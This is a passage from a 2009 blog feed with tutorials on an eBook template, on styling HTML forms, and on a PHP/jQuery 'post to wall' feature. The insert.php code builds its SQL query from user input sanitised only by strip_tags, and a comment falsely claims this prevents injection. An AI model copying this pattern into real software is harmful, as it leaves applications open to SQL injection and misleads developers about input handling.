src="http://1.bp.blogspot.com/_TqPdHmAEwTM/R6Ds89u3tkI/AAAAAAAAA0U/biqUma6R5w4/s400/tag_orange.png" style="margin-left: 14px;" align="absmiddle" border="0" /&gt; &lt;a href="http://www.box.net/shared/fkd8iy50p1"&gt;Download Microsoft Word template&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;eBook Format&lt;br /&gt;&lt;/h5&gt;You can print the eBook on A4 format page (2 pages for each facade). This is the screenshot:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh5.ggpht.com/_TqPdHmAEwTM/SV_xyj6TWJI/AAAAAAAADP4/gJy5ZUS4zZA/whp1.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;h5&gt;Document structure&lt;/h5&gt;The document is divided in &lt;em&gt;sections&lt;/em&gt;. Each section is a chapter. Use "section break" to separate each chapter in this way:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/SWDQ9kEbL_I/AAAAAAAADQc/V2Yxj4Ys7uQ/templ1.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Adding a section break:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;- Apple Pages:&lt;/strong&gt; &lt;em&gt;Insert &gt; Section Break&lt;/em&gt;&lt;br /&gt;&lt;strong&gt;- Microsoft Word:&lt;/strong&gt; &lt;em&gt;Insert &gt; Break &gt; Section break (next page)&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;Page header&lt;/h5&gt;This is a not necessary element but i like have a short description in the header of the my pages. It's a simple text on top of your page with above a line which separete the header from the rest of the page:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/SWDb_CQnK2I/AAAAAAAADQs/Y4mMMo4m0vI/pageheader.png" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;In general "page header" isn't placed on the first page of the chapter:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;- Apple Pages&lt;/strong&gt;: select &lt;em&gt;layout&lt;/em&gt; button on the inspector and flag the option: &lt;em&gt;First Page is different&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/SWDc0a0UPMI/AAAAAAAADQ0/d7ggYdzDUyU/layot.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;strong&gt;- Microsoft Word&lt;/strong&gt;: double click on the page header and select &lt;em&gt;different first page&lt;/em&gt; from the header/footer toolbar.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h5&gt;Chapter structure using document styles&lt;/h5&gt;When you work with a text document (using Word, Apple Pages, OpenOffice...), a very good practice  is to define your &lt;em&gt;custom styles&lt;/em&gt; for the elements of your pages. In this way, every time you decide to modify the look of an element (for example "chapter title"), it will be update automatically in all elements of your document which use that style. For example take a look at the following picture which represents a generic chapter structure:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh5.ggpht.com/_TqPdHmAEwTM/SWDW0-Kd4bI/AAAAAAAADQk/PBgBOCf3WSM/whtempl.png" /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;We have the following elements with related styles:&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Chapter title&lt;/em&gt; -&gt; Heading 1&lt;br /&gt;&lt;em&gt;Article title&lt;/em&gt; -&gt; Heading 2&lt;br /&gt;&lt;em&gt;Paragraph header&lt;/em&gt; -&gt; Sub header paragraph&lt;br /&gt;&lt;em&gt;Normal text&lt;/em&gt; -&gt; Body&lt;br /&gt;&lt;em&gt;Code box&lt;/em&gt; -&gt; Code&lt;br /&gt;&lt;em&gt;Footnotes&lt;/em&gt; -&gt; Notes&lt;br /&gt;&lt;em&gt;Article footer&lt;/em&gt; -&gt; Small header + small body&lt;br /&gt;&lt;br /&gt;You can define your custom style in this way:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;- Apple Pages:&lt;/strong&gt; &lt;em&gt;View &gt; Show Style Draver&lt;/em&gt; and then selecting a style and modifying style properties, or creating a new style.&lt;br /&gt;&lt;strong&gt;- Microsoft Word:&lt;/strong&gt; &lt;span style="font-style: italic;"&gt;Format&lt;/span&gt;&lt;em&gt; &gt; Style &lt;/em&gt;and then selecting a style and modifying style properties, or creating a new style.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Note:&lt;/strong&gt; I used &lt;em&gt;Qlassik&lt;/em&gt; font for the title of chapters and articles. You can &lt;a href="http://woork.blogspot.com/2008/09/10-fonts-to-design-original-logos.html"&gt;download it here&lt;/a&gt;. In this version of template I used Arial in case you don't have Qlassik font.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;h5&gt;Table of  contents&lt;br /&gt;&lt;/h5&gt;Adding a TOC it's very simple:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;- Apple Pages:&lt;/strong&gt; &lt;span style="font-style: italic;"&gt;Insert&lt;/span&gt;&lt;em&gt; &gt; Table of content&lt;/em&gt;.&lt;br /&gt;&lt;strong&gt;- Microsoft Word:&lt;/strong&gt; &lt;span style="font-style: italic;"&gt;Insert &gt; Document element &gt; Table of content&lt;/span&gt;&lt;em&gt;&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Your TOC will be updated automatically every time you add a new content in your document but (this is really important!) you have to use style elements created for the chapter title and article title (&lt;em&gt;Heading 1&lt;/em&gt; and &lt;em&gt;Heading 2&lt;/em&gt;).&lt;br /&gt;&lt;br /&gt;It's all! I hope this template can help you to prepare quickly your eBook.&lt;br /&gt;&lt;br /&gt;Every suggestion is appreciated :)&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Note:&lt;/strong&gt; I used Apple Pages to create my eBook, and I simply converted Pages template for Word. I experienced there are some litte problems with formatting which you convert a document in Word from Apple Pages... tell me if you have them!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-775471019500267845?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/775471019500267845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=775471019500267845' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/775471019500267845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/775471019500267845'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-create-awesome-ebook-template.html' title='How to create an awesome eBook Template using Word or Apple Pages'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_TqPdHmAEwTM/R6Ds89u3tkI/AAAAAAAAA0U/biqUma6R5w4/s72-c/tag_orange.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6504470365862671739</id><published>2009-07-28T20:11:00.011-07:00</published><updated>2009-07-28T20:11:06.966-07:00</updated><title type='text'>How to skin HTML form elements in seconds</title><content type='html'>&lt;div class="bigInt"&gt;In the past weeks I received some requests from my readers which asked to me to suggest a simple way to skin HTML form elements. There are a lot of ways to do that and a lot of posts  with interesting resources about this topic. But if you want to save time and obtain a nice result I suggest you to use jqTransform or NiceForms.&lt;/div&gt;&lt;br /&gt;Both scripts are very useful and simple to use. If you want to use a "native" script which doesn't use an external JS framework (such as jQuery or MooTools) I think a good choice is NiceForms otwerwise, if you use jQuery, a good alternative is jqTransform. Take a look how they work.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1. jqTransform&lt;/strong&gt;&lt;br /&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/SfR6tvmd1UI/AAAAAAAAD_A/VPNFpx_dErY/form1.png" style="border: 1px solid rgb(222, 222, 222); padding: 4px; float: right; margin-left: 14px;" /&gt;&lt;a href="http://www.dfc-e.com/metiers/multimedia/opensource/jqtransform/"&gt;jqTransform&lt;/a&gt; is a jQuery styling plugin wich allows you to skin quickly form elements in a very easy way. The only thing you have to do is to add a javascript inclusion to this plugin in the header section of your web page, create your form and add two lines of JS code to apply the transformation to your form.&lt;br /&gt;&lt;br /&gt;Use this code to add a javascript inclusion to jqTransform:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;src=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"jquery.jqtransform.min.js"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;...now create a form with class property equal to &lt;span style="font-weight: bold;"&gt;jqTransform&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form class=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"&lt;span style="font-weight: bold;"&gt;jqTransform&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&amp;lt;!-- Add form elements here... --&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;...then add this JS code to apply the transformation:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;$&lt;span style="font-weight: bold;"&gt;(&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;function&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;() {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;$&lt;span style="font-weight: bold;"&gt;(&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"form.jqtransform"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;).&lt;/span&gt;jqTransform&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;();&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;});&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2. NiceForms&lt;/strong&gt;&lt;br /&gt;&lt;img src="http://lh5.ggpht.com/_TqPdHmAEwTM/SfR8mA7U3hI/AAAAAAAAD_I/bOs8Daxd0Qs/form2.png" style="border: 1px solid rgb(222, 222, 222); padding: 4px; float: right; margin-left: 14px;" /&gt;&lt;a href="http://www.emblematiq.com/projects/niceforms/"&gt;Niceforms&lt;/a&gt; is a script that will replace the most commonly used form elements with custom designed ones. You can either use the default theme that is provided or you can even develop your own look with minimal effort.&lt;br /&gt;&lt;br /&gt;To implement form style transformation you have to add a javascript inclusion to NiceForms in your web page using this code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;src=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"niceforms.js"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;...then create a form with class property equal to &lt;span style="font-weight: bold;"&gt;niceform&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form class=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"&lt;span style="font-weight: bold;"&gt;niceform&lt;/span&gt;"&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&amp;lt;!-- Add form elements here... --&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;It's all. Really simple and fast!&lt;br /&gt;&lt;br /&gt;Any suggestion? Please leave a comment.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6504470365862671739?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6504470365862671739/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6504470365862671739' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6504470365862671739'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6504470365862671739'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-skin-html-form-elements-in.html' title='How to skin HTML form elements in seconds'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_TqPdHmAEwTM/SfR6tvmd1UI/AAAAAAAAD_A/VPNFpx_dErY/s72-c/form1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-939037511244282110</id><published>2009-07-28T20:11:00.009-07:00</published><updated>2009-07-28T20:11:05.934-07:00</updated><title type='text'>How to implement a Post-to-Wall Facebook-like using PHP and jQuery</title><content type='html'>&lt;div class="bigInt"&gt;In the past months I received a lot of request to write a tutorial for beginners in order to explain how to implement a Post-to-Wall Facebook-like. So, I prepared this very simple example which helps everyone understand how to implement this feature in a website using just some lines of PHP and JavaScript code.&lt;/div&gt;&lt;br /&gt;Take a mind, every post in the Facebook Wall contains a lot of information (user, sender, message content, date, number of comments, ...):&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/SgNHu4at28I/AAAAAAAAEB4/h8roJ7qGOCU/wall.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;But how I said, this tutorial is for Ajax/jQuery/PHP beginners. So I decided to simplify the original Wall using just a single information: the message content.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/pskmjcsiqa"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In this tutorial we have these files:&lt;br /&gt;&lt;blockquote&gt;- confing.php (database connection parameters)&lt;br /&gt;- index.php&lt;br /&gt;- insert.php&lt;br /&gt;- jquery.js&lt;/blockquote&gt;How the Wall works?&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/SgM5jtVc5EI/AAAAAAAAEB0/TaLnf-88Q-c/facebook-jquery.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;index.php &lt;/span&gt;contains a form with id &lt;em&gt;"submit_form"&lt;/em&gt; with an input text with id &lt;em&gt;"message_wall"&lt;/em&gt;. When an user submits a new message. Then the new message is appends to top of the ul list with id &lt;em&gt;"wall"&lt;/em&gt; with a nice fade-in effect (with jQuery). Ok, now take a look at the code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1. index.php&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;index.php&lt;/em&gt;  is very simple and contains just simple HTML code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"submit_wall"&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;amp;gt&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;label for=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"message_wall"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;Share your message on the Wall&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/label&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;input type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"message_wall"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;button type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"submit"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;Post to wall&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/button&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;ul id=&lt;span style="color: rgb(51, 102, 255);"&gt;"wall"&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;The &amp;lt;ul&amp;gt; list with id &lt;span style="font-weight: bold;"&gt;"wall"&lt;/span&gt; is the "container" of messages which are posted into the wall.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2. JavaScript Code&lt;/strong&gt;&lt;br /&gt;Open &lt;em&gt;index.php&lt;/em&gt; and include jQuery in the &lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;head&amp;gt;&lt;/span&gt; tag of the page:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;src=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"jquery/jquery.js"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt; &amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;...then add this simple function to enable Ajax functionalities to insert the message posted from the user into a  database table without reload the page:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;$&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;document&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.ready&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;function&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(){&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt; $&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"form#submit_wall"&lt;/span&gt;).submit&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;function&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;() {&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; message_wall &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'#message_wall'&lt;/span&gt;).attr&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'value'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$.ajax&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;({&lt;/span&gt;&lt;br /&gt;type&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;"POST"&lt;/span&gt;,&lt;br /&gt;url&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;"insert.php"&lt;/span&gt;,&lt;br /&gt;data&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"message_wall="+&lt;/span&gt; message_wall,&lt;br /&gt;success&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;function&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(){&lt;/span&gt;&lt;br /&gt;$(&lt;span style="color: rgb(51, 102, 255);"&gt;"ul#wall"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.prepend&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"&amp;lt;li style="&lt;span style="font-weight: bold;"&gt;display: none&lt;/span&gt;;"&amp;gt;"+&lt;/span&gt;message_wall&lt;span style="color: rgb(51, 102, 255);"&gt;+"&amp;lt;/li&amp;gt;"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;$(&lt;span style="color: rgb(51, 102, 255);"&gt;"ul#wall li:first"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.fadeIn&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;  });&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;return false;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt; });&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;});&lt;/span&gt;&lt;/div&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;.prepend(...)&lt;/span&gt; is a jQuery function to insert elements inside, at the beginning, of a specific  element (in this case UL list with id wall --&gt;$(&lt;span style="color: rgb(51, 102, 255);"&gt;"ul#wall"&lt;/span&gt;)). When the new message is added into the list is hidden (&lt;span style="font-weight: bold;"&gt;display:none&lt;/span&gt;). Then it appears with a fade-in effect:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"ul#wall li&lt;span style="font-weight: bold;"&gt;:first&lt;/span&gt;"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.fadeIn&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;ul#wall:first&lt;/span&gt;: gets the first &lt;em&gt;li&lt;/em&gt; element (the last added) into the ul list with id "#wall".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;3. insert.php&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;em&gt;insert.php&lt;/em&gt; contains some lines of PHP code to insert the new message into a database table. In this example I created a table &lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt;WALL&lt;/span&gt; with just one attribute &lt;span style="color: rgb(0, 0, 153);"&gt;"message"&lt;/span&gt;. PHP code is very simple:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;&amp;lt;?php&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;if&lt;/span&gt;&lt;span style="color: rgb(51, 51, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;isset&lt;/span&gt;&lt;span style="color: rgb(51, 51, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;$_POST&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'message_wall'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;])){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;/* Connection to Database */&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;include&lt;/span&gt;(&lt;span style="color: rgb(204, 0, 0);"&gt;'config.php'&lt;/span&gt;)&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;/* Remove HTML tag to prevent query injection */&lt;/span&gt;&lt;br /&gt;$message &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; strip_tags&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;$_POST&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'message_wall'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;])&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$sql &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'INSERT INTO WALL (message) VALUES(&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;    "'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$message&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'")'&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;mysql_query&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$sql&lt;span style="color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; $message;&lt;br /&gt;&lt;span style="color: rgb(0, 